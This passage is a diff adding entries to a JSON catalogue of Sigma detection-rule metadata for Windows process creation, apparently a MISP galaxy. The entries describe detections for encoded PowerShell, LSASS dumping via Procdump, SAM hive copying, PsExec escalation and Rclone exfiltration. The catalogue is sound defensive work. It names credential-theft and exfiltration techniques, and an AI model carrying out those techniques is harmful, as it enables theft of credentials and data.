"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/07/09", + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/09/03", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS", + "meta": { + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/04/23", + "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "author": "John Lambert (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process", + "meta": { + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious parents of powershell.exe", + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/03/20", + "filename": "proc_creation_win_susp_powershell_parent_process.yml", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "level": "high", + "falsepositive": [ + "Other scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2021/07/29", + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sub processes spawned by PowerShell", + "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "value": "Suspicious PowerShell Sub Processes", + "meta": { + "refs": [ + "https://twitter.com/ankit_anubhav/status/1518835408502620162", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/26", + "filename": "proc_creation_win_susp_powershell_sub_processes.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies", + "meta": { + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use print.exe for remote file copy", + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_print.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", + "value": "Process Hacker / System Informer Usage", + "meta": { + "refs": [ + "https://processhacker.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/10", + "filename": "proc_creation_win_susp_process_hacker.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/11", + "filename": "proc_creation_win_susp_progname.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ], + "creation_date": "2020/10/30", + "filename": "proc_creation_win_susp_psexec_eula.yml", + "author": "omkar72", + "level": "medium", + "falsepositive": [ + "Administrative scripts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc.yml", + "author": "Romaissa Adjailia, FLorian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "value": "PsExec Service Execution as LOCAL SYSTEM", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc_as_system.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc_renamed.yml", + "author": "FLorian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/11/23", + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/05/22", + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", + "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "value": "Suspicious Use of PsLogList", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_susp_psloglist.yml", + "author": "Nasreddine Bencherchali @nas_bench", + "level": "medium", + "falsepositive": [ + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/09", + "filename": "proc_creation_win_susp_ps_appdata.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ], + "creation_date": "2020/08/28", + "filename": "proc_creation_win_susp_ps_downloadfile.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code", + "meta": { + "refs": [ + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/11", + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ], + "creation_date": "2022/01/22", + "filename": "proc_creation_win_susp_radmin.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level", + "meta": { + "refs": [ + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2020/05/12", + "filename": "proc_creation_win_susp_rar_flags.yml", + "author": "@ROxPinTeddy", + "level": "high", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity", + "meta": { + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "author": "juju4", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer Subprocess", + "meta": { + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "author": "Florian Roth, Maxime Thiebaut", + "level": "high", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/10", + "filename": "proc_creation_win_susp_rclone_execution.yml", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + "Legitimate RClone use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/30", + "filename": "proc_creation_win_susp_recon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network Reconnaissance Activity", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ], + "creation_date": "2022/02/07", + "filename": "proc_creation_win_susp_recon_network_activity.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": "Regedit as Trusted Installer", + "meta": { + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2021/05/27", + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe", + "meta": { + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://ss64.com/vb/cscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/11/05", + "filename": "proc_creation_win_susp_registration_via_cscript.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly", + "meta": { + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "author": "Florian Roth, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ 